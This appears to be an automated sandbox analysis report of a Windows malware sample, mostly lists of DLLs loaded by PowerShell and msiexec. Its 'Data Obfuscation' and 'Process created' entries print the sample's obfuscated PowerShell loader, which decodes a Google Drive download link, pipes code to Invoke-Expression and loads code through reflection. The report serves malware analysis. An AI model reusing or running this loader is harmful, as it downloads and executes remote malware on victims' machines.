Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasapi32.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasman.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rtutils.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc6.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc.dll			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll			Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: *.pdbS source: powershell.exe, 00000001.00000002.1956313981.000002681D883000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.Core.pdb source: powershell.exe, 00000006.00000002.2175218431.0000000007450000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ment.Automation.pdb source: powershell.exe, 00000006.00000002.2175218431.0000000007431000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ows\dll\System.Core.pdbsAF source: powershell.exe, 00000001.00000002.1955638921.000002681D7FE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbx source: powershell.exe, 00000001.00000002.1956313981.000002681D883000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2181957745.000000000823C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ystem.pdbnA source: powershell.exe, 00000001.00000002.1955638921.000002681D7FE000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("POWERSHELL " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionern", "0")

Source: Yara match	File source: 00000006.00000002.2185161641.000000000B0D5000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2184830111.0000000008800000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2169361700.00000000059A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1951410104.0000026815481000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Blndet)$GlOBAl:byCYKleRnE = [sYsTEM.text.ENcODIng]::AScIi.GEtstrINg($fEUDalLY)$GLobAL:BaJEres=$bYCyKLerNE.SUbStRING($GOSPELS,$FlApR2)<#Idelrens Herma Nanetts Mouthful #>$Visiteredes=
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Toothily $Transpositively $Ilexes), (Kvlerne @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Adoniserne = [AppDomain]::CurrentDomain.GetAssemblies()$global
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Fllesinteressen57)), $Suppresion).DefineDynamicModule($Scrutinizes, $false).DefineType($Jockeydom, $Coshered, [System.MulticastDelegat
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Blndet)$GlOBAl:byCYKleRnE = [sYsTEM.text.ENcODIng]::AScIi.GEtstrINg($fEUDalLY)$GLobAL:BaJEres=$bYCyKLerNE.SUbStRING($GOSPELS,$FlApR2)<#Idelrens Herma Nanetts Mouthful #>$Visiteredes=

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe c
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe c
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe c			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B951229 pushad ; iretd		1_2_00007FFD9B951249
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_0761A3C8 pushfd ; ret		6_2_0761A5FD
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0043891E pushad ; iretd		8_2_0043891F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_00438C2F pushfd ; iretd		8_2_00438C30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_00432D49 push 8BFFFFFFh; retf		8_2_00432D4F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_00438DDF push esp; iretd		8_2_00438DE0

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
